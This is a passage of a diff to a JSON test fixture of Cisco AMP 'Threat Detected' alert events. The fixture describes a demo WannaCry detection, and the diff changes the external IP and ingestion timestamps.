"8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -7344,8 +7344,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025468432Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064607\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:39.764512800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064607\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -7367,7 +7367,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -7417,7 +7417,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -7434,8 +7434,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025471879Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064604\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:39.764517800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064604\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -7457,7 +7457,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -7507,7 +7507,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -7524,8 +7524,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025474160Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":876000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064603\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:39.764523900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":876000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064603\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -7547,7 +7547,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -7597,7 +7597,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -7614,8 +7614,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025476413Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":845000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:39.764527800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":845000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -7637,7 +7637,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -7687,7 +7687,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -7704,8 +7704,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025478624Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":798000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:39.764532300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":798000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -7727,7 +7727,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -7777,7 +7777,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -7794,8 +7794,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025480920Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":767000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:39.764538200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":767000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -7817,7 +7817,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -7867,7 +7867,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -7884,8 +7884,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025483136Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064600\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:39.764542500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064600\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -7907,7 +7907,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -7957,7 +7957,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -7974,8 +7974,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025485390Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":735000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat 